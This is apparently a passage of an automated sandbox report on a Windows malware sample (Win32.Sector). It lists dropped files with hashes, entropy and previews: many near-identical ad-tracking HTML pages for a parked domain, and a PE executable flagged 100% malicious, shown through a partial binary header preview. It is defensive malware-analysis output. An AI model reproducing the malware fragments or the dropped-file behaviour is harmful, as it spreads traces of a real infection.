Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODA5NC42MTA5OjZjMGU1YzNjYTRjNjI2NDc5OGZiOWNjNzYzYmFmZmE2MjJkOTExNGFhNjdlNTNlMGVjM2NiMzVlNDUwNGI0NTc6NjcxMjNiNWU5NTI2YQ==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2I1ZTk1MjFjfHx8MTcyOTI0ODA5

Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
File Type:HTML document, ASCII text, with very long lines (361)
Category:dropped
Size (bytes):2265
Entropy (8bit):5.643458634868076
Encrypted:false
SSDEEP:48:+mazpF4l9xMqUtmtE9VCt6cBxv3M7ioaxyi6CVoMTf992wP:Nl9jUh9Vcdei1yi75l928
MD5:2FA1AB7E90421DF81DF5AE634A581FAE
SHA1:D9F82B2E6DAC41A31D9EE05C595E96A6D94C0F33
SHA-256:11CA935FE1C108CF4EB80CD6230523E4FA965C3CB5FF1B5227147EC7311FDF85
SHA-512:A2DFE5F36849E231B901E7BD8BF81CFB7089993291855E233410416201B7704DC313D9CB2B215610B7F668F1CA25574D7B5E70AFD8BDF4E5B80DFCEF46EA5C94
Malicious:false
Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODI5Mi44NjkxOjgxMGEwOTdkZmRiYmEyN2FkYTcwMDVlZDEyNGFlM2RhNWViNGFhOTRlYzc4NGE2MmU2NTFlNGEyMzEzZTQ0YTg6NjcxMjNjMjRkNDJlOQ==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2MyNGQ0MmIwfHx8MTcyOTI0ODI5

Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):66561
Entropy (8bit):7.973549754761645
Encrypted:false
SSDEEP:1536:rBkAC6jDPqr3cOt+XmhLazoHl/8GPMXFWLihEOmDL:rBkoujcchWUHFYWW4
                                                                                                                                                                                                                                                                                          MD5:945D0DB4CA552A9CA9C64C40791E4E3C
                                                                                                                                                                                                                                                                                          SHA1:3BA0367461F9137B953A2574212ABAD51D8FDF72
                                                                                                                                                                                                                                                                                          SHA-256:A41439CA796D517B089D838B9DEF1DA5B88F3F2863D6EAF2FDDB0B146C4D0710
                                                                                                                                                                                                                                                                                          SHA-512:61260D6ED75BD61D4806747CACBEAE3442D3BA76E30372C8D75305806260D15E41C5A3649B8CE53D8CC4C1620432EA1B3218FD5B5A1B68D7B1BF6C139C03C1CD
                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2261
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.6391538698566075
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:+mazpFFEPVMqUtmtE9VCO5cBRG3M7ioaxyi6CVQJMTf992wP:6E/Uh9VDuXBi1yi75l928
                                                                                                                                                                                                                                                                                          MD5:3D3CA7993862A73E58E8038B00D195AB
                                                                                                                                                                                                                                                                                          SHA1:8E189574D9345D3140105DC73D20DCE0412BC40C
                                                                                                                                                                                                                                                                                          SHA-256:4FE67AE299784584A3AC36964D7B1E5D51172A2886CC6D866A176FF12F1D90DA
                                                                                                                                                                                                                                                                                          SHA-512:5E66C4B155DF045BDB5DB0A7BA9DD8F969EF9EF0C1E165630A500DC25244A7A9C63C674E3483AA13C50D14F1A91EF190404ACCE249A468D619201049BF191007
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2265
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.642497576953686
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:+mazpFscFIMqUtmtE9VCmfecBlwC3M7ioaxyi6CVm1MTf992wP:vcFkUh9VzhXw9i1yi7mMl928
                                                                                                                                                                                                                                                                                          MD5:054EA5E1BFDB7D576EC003B9DEFE5A95
                                                                                                                                                                                                                                                                                          SHA1:2ADF21B36B4C48CBDB7B8559AA99BB33C4B87B29
                                                                                                                                                                                                                                                                                          SHA-256:1C17CAB407F540E0056D00271367BBBEEA0669B00FE06D9CF98454C8E3B9DBC2
                                                                                                                                                                                                                                                                                          SHA-512:43D2E96A590C690B7B34318F35D92E5EA2A245EAD27E211A838BCA18BE23ED8D731096C4B14CD930199ADB34778B21CA175C589B55966B1418F4F156697869F5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2265
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.64456067495782
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:+mazpFDlMqUtmtE9VCT5cBJ3M7ioaxyi6CVG4MTf992wP:O3Uh9VlOi1yi72l928
                                                                                                                                                                                                                                                                                          MD5:66752CC118C839E4764B1A4DBA4717F1
                                                                                                                                                                                                                                                                                          SHA1:42387754BF92C4147C41E8CE1DDB0B549FB5C7EF
                                                                                                                                                                                                                                                                                          SHA-256:F861B309375A4667E6E48FCE38FE5D0AAA07C0E2AA4A50FC1BE3BF23D2900AE6
                                                                                                                                                                                                                                                                                          SHA-512:944AD9729475E28A2416C561591F46A8B656C23B455DD49E55FF1DF009216A94A28274A286A5E7D60DFFA5B9B1132E0FD0A805BD0880BCB671A3DA752F38D3A6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2265
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.64815817242641
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:+mazpFuyEIsEMqUtmtE9VC3mcBosz3M7ioaxyi6CVH9MTf992wP:jyEIsQUh9VOz6i1yi7HUl928
                                                                                                                                                                                                                                                                                          MD5:F511F3393F15E2A40D4A0F47F01C0FA8
                                                                                                                                                                                                                                                                                          SHA1:1229442B4EB431EDD832115F208B5354DF5DB6C7
                                                                                                                                                                                                                                                                                          SHA-256:CFA5C89E6B94D8895B350E47410B9E50BF0FE1D36880CAADD624D0D5D5522117
                                                                                                                                                                                                                                                                                          SHA-512:A3374CD49F3CEF46BE0D5176958D8060FAF97D3D0CFAE8EA86BDCCE9617794B3D4D2A51995C49F5C0CF76FEEEB5D4315430643AA75AFF95B8D02583D1E1841FF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2265
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.6330177426182715
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:+mazpFonX5MqUtmtE9VCblcBw3M7ioaxyi6CVSkVMTf992wP:hUh9V5Bi1yi7Sksl928
                                                                                                                                                                                                                                                                                          MD5:599CF3DC1F39236311B950AE3EEAC98D
                                                                                                                                                                                                                                                                                          SHA1:5955BB9BF3FF1B385869996DCB06AA10F3A30892
                                                                                                                                                                                                                                                                                          SHA-256:6F4A3D1A387F873EA278A200105E5B213CC9E02D24F7A2A5C2CDB70976361877
                                                                                                                                                                                                                                                                                          SHA-512:AE5E8A5CB392D41F4327A16A432ABB3B1864A253A4A019F987364C348FC1BD3B5FA7EA4FBFCF74F1991473182E03118AC15FAF9E923079780E410B791561F936
                                                                                                                                                                                                                                                                                          Malicious:false

Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
File Type:HTML document, ASCII text, with very long lines (361)
Category:dropped
Size (bytes):2265
Entropy (8bit):5.640444706931715
Encrypted:false
SSDEEP:48:+mazpFR5MqUtmtE9VC87cBKB3M7ioaxyi6CV5MTf992wP:UbUh9VZg4Mi1yi7Ql928
MD5:746EE4D46EAC842AE8F8D94B652766A0
SHA1:9F2373456F3CD50FCF97855E72ECDBF788779DAF
SHA-256:96E5A6BD015CB014F49749C2520A456AA12D61C4B867C47D75431B2381308379
SHA-512:106D87CA5542BFD1CCC5090B37999C7CD1BDB169C6916F2DCFC7FCA755242573F18CDC2D77BC03D070AB9B1C1F4A2E3CB536E292888E23951D47BAEADA9A3ED4
Malicious:false
Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODIxOC43MjgyOmM0MGJiOWJiYTI1ZjFlNGUwZGU2NDJlMTYwN2VkZWE2NWM1OTQzNzhiYThkOWQ5ODJiNWM2NzM2OWJkZDlkMmI6NjcxMjNiZGFiMWNiMA==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2JkYWIxYzY5fHx8MTcyOTI0ODIx

Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
File Type:HTML document, ASCII text, with very long lines (361)
Category:dropped
Size (bytes):2265
Entropy (8bit):5.638380629553282
Encrypted:false
SSDEEP:48:+mazpFdp+MqUtmtE9VCv6cBF3M7ioaxyi6CVBMTf992wP:AQUh9VGqi1yi7Yl928
MD5:3B7C799A3EDBE71C2CAF2FF78A50CDEF
SHA1:20B5121274517535F5EB7FD3AC1354B4EC2BDB31
SHA-256:BACE828A871D8042B6D828310CD9873BDB3D4FEDC70EDFDC28DBBE3F03E7EF7F
SHA-512:F35065E65C55C1C5F5EDF04D7B82DE305A96E4A46A932411FAAB1657181D49DCB402A0A1EB7ACB85670F179166E6B78F22CA3519DEB8E09D4441DD1125F25F1F
Malicious:false
Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODEyMS4xNDI3OjliMzMzYWZlODdjNTkzMTIyMmMwMTEyZDQwMTk1MTc3OWJlOTJkYzQzNTVhYWM2OTgxODIzNGE3MThiMDc3NDI6NjcxMjNiNzkyMmQ3OQ==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2I3OTIyZDRmfHx8MTcyOTI0ODEy

Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
File Type:HTML document, ASCII text, with very long lines (361)
Category:dropped
Size (bytes):2265
Entropy (8bit):5.652244310829131
Encrypted:false
SSDEEP:48:+mazpFwgcDrMqUtmtE9VCM2cBV3M7ioaxyi6CV2MTf992wP:PgU5Uh9Vz5ii1yi7fl928
MD5:FDDD547A77480DA228C858CF78051A5E
SHA1:37FEDEDD9DB59BACEEE658A05D5577C5F1B3D026
SHA-256:FA0B7C0A5A37D6A5DE73C6B375E7BC3ACDC462CBB0168430C8AA8DB8733677E1
SHA-512:EFA627F7C811540AA1DA958807F4F989F6B54BF38BFECBF1F47A514155EC8D5CCB2371C815A1660EBF27501BE7FC208B5CFCDC6360756D0C9FF63D4A0F4E4ADE
Malicious:false
Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODEzOC4yNjIzOjY5NWJlZDM4NjYzZTI3ODk4MTlhYjdlZDEzYWViZjcxZjZmMDQ4MGJmMzhjNmQ0YmUwNGFkMmVhNTY0OWI4MDU6NjcxMjNiOGE0MDA2Yw==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2I4YTQwMDNkfHx8MTcyOTI0ODEz

Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):66561
Entropy (8bit):7.973724333428112
Encrypted:false
SSDEEP:1536:7uSWEpo6q15U+q3Az3uuH2t2n91OwQKDzuJd6pZtwpGbHw6mNQv:7FWEi6q3FMO3VWon91XeJUftw0bMNQv
MD5:1055DB83CB3F76F605B20449C129F8D6
SHA1:2DAF7C651F37AD51007A97AA20D76D80325B6A64
SHA-256:24310ADF8F28520EC8DBF0EF10DD1AEE64B09934335461525AEFD22C57BD2FA9
SHA-512:0DBE6A4F02CD2FD6741A331F76DF510B9D83BDC7B515B628597E67571FB9CACA5AC59CB36D7CB4C159F849582EF3D40309099E874066E1BAC70A494989528F64
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E.r..o...o...o...o...o..cp...o...p...o..Rich.o..........PE..L....N.L..................................... ....@.......................... ..................................................(....................................................................................................................text.............................+. ................................................................[.n..~..$.....E.....E..M.....M..U.....U..E.....E..M.....M..U.....U..E.....E..M.....M..U.....U.h N......@.j.....@.3...]...........................................................}.ExitProcess...Sleep.d.SetErrorMode..KERNEL32.dll..............................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
File Type:HTML document, ASCII text, with very long lines (361)
Category:dropped
Size (bytes):2265
Entropy (8bit):5.647490316801236
Encrypted:false
SSDEEP:48:+mazpFxWOLMqUtmtE9VCzBAEcBb3M7ioaxyi6CV/+MTf992wP:MWOZUh9VMB6wi1yi7Pl928
MD5:D3B408D47BFFD12C3DF268B2B98DA29A
SHA1:3A449FC66630668D14A46747BB2BA4F26DC15984
SHA-256:4832BC565030814F0793B359C6D9F18FB1A3338270527D560B4EE6922741FDBE
SHA-512:E51517A662652404F1E0F5FB4471D731835E59D29E72BBA8E80F4E6ADBA3DC53DC9E5A16D1F58DD6B955BE3393A8426A61E697074C8E3EA2E7ED211F8911D470
Malicious:false
Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODIzMC43NzU0OjAwOGExMDFkODQxMDZhOWI3NGExODQwNmE4YWY2MGIzMjgzNDQwY2QxNWNhMDQzOThkZDc4N2YxNzY4OTZhODQ6NjcxMjNiZTZiZDRmNA==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2JlNmJkNGFmfHx8MTcyOTI0ODIz

Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
File Type:HTML document, ASCII text, with very long lines (357)
Category:dropped
Size (bytes):2261
Entropy (8bit):5.659269368304425
Encrypted:false
SSDEEP:48:+mazpFioMqUtmtE9VCqbwlfdo+M7ioaxyi6CVtmMTf992wP:wUh9VTyCi1yi7xl928
MD5:68C09FCE76F96240B19A8299FB87B9C0
SHA1:3D708084FC92577CDD5667EF9B15CD01B6B4A2FE
SHA-256:0F62DF44E711957D0A93124FA598247E0120123F05F77CDD475C6A0EC875C4CB
SHA-512:8EE7E27C4823BD42C6B339E4EDE8CE707F0DD4675B206D907A73A98AA35D72D415D20B79B768C0AC138C618FCDD64F383668245E76493F3286493F0AA6361BAD
Malicious:false
Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODExNS4wODE1OjM4YTA2MGJmNWI3NzE1NmQ4YjZiYjA0Yzk5ZTNkOGE4ZGQzZGYyM2RhMGRmOGRmMjY0MTY1MjYxNTdkNGVhNTc6NjcxMjNiNzMxM2U4NQ==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2I3MzEzZTU2fHx8MTcyOTI0ODEx
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2261
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.644051256915002
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:+mazpFReEruMMqUtmtE9VCBsGiUcByA3M7ioaxyi6CVhMTf992wP:vWhUh9V+sGawi1yi74l928
                                                                                                                                                                                                                                                                                          MD5:1E2C672B9B8C8E1BAD2851901B6DBB1A
                                                                                                                                                                                                                                                                                          SHA1:4542C18E1835BC4C130446382B3F1AF519B2F085
                                                                                                                                                                                                                                                                                          SHA-256:62FBBD0D473B2EA7BEDC5E5E821188104ED1E616AD8D5F5181AD5E4AEBFF69F8
                                                                                                                                                                                                                                                                                          SHA-512:40660D685145301F620AE9D18935814847EB799BB6062FDC18B1E59B505A8CAADFAFDE3C10EEA6C948728B1D790F794701BCA9451FB444052755C5FB9D478CA0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODMxNy4zNDU6M2JlMWZmZmE1ZDRiN2VlN2M2MzhiZmNhYmM5MTE1MGUyM2FmOGY3YTA2ZTU5MDlkNWQ4ZmY2ZTgzMzIzOGI4Nzo2NzEyM2MzZDU0M2Mx';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2MzZDU0Mzg2fHx8MTcyOTI0ODMxNy41
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2265
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.652220920703378
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:+mazpFEvXf42MqUtmtE9VC0b48cB+3M7ioaxyi6CVx7MTf992wP:HvHUh9V1b4vPi1yi7xSl928
                                                                                                                                                                                                                                                                                          MD5:FF267AD5B1CF16F796230E372A4C6072
                                                                                                                                                                                                                                                                                          SHA1:747EA4B418EAA4C95EDFF68D677CE2186A7131F6
                                                                                                                                                                                                                                                                                          SHA-256:C4F9A9A10CA0C68FC0946A51DB276E5830B88F47B8ADD0314201E26E0FC9B4C8
                                                                                                                                                                                                                                                                                          SHA-512:46F30B43CF91FC5BDF9D4427D02ABB1CAA4E87B0598F5C25EA94CE4384652D9AB43D903C11AAC51AA4203AE77D05BF459ABDA6831D005E2DD1F2144EF79B0E0E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODI0OC43MTAxOjNiY2RlMDJjNzM0ZGFhODEwNGJjMGEwNWY1NzlkOGFhM2QzYzExMzNjNjc1YWJjNzdlMWQwNDBjZWM4MzNhNDA6NjcxMjNiZjhhZDVhNA==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2JmOGFkNTc3fHx8MTcyOTI0ODI0
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2265
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.642814793302475
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:+mazpFfHZtDvMqUtmtE9VCvcBr3M7ioaxyi6CV8LMTf992wP:E5tZUh9VrIi1yi7fl928
                                                                                                                                                                                                                                                                                          MD5:45D16A698221910A39461A48CDAEC87D
                                                                                                                                                                                                                                                                                          SHA1:5406503B56A5097BD1CAC3BC00DBAF68C62A7578
                                                                                                                                                                                                                                                                                          SHA-256:A027A4D5C82D9E63AEAE47F3C89A4034B38318FC5BC67253929C582D821B39D1
                                                                                                                                                                                                                                                                                          SHA-512:A4BF15ED1DDD93A277D03C015460E214716DB9120F3177B33A2306FD6CE11927ED2A1A38B8F2FAAF5DEF1CB5B97081F15E753912DB0CEAED1CEEA54599BF234E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODMyMy4yNTI5OjZkOGQ2YTE0ZGI3YjIxMjY3ODMwMmMyYTA0ZjllYjdhMjA0OTM0Yjg0ODllYjU4YzE1ZjUzOTZhMzViZTVlODk6NjcxMjNjNDMzZGJmZQ==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2M0MzNkYmQzfHx8MTcyOTI0ODMy
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2265
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.64433659322831
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:+mazpFDGIccMqUtmtE9VCmBN/cBS83M7ioaxyi6CV0MTf992wP:DI3Uh9VHUQri1yi7Vl928
                                                                                                                                                                                                                                                                                          MD5:264AAF69C1EEAA5505B02190C58A09B4
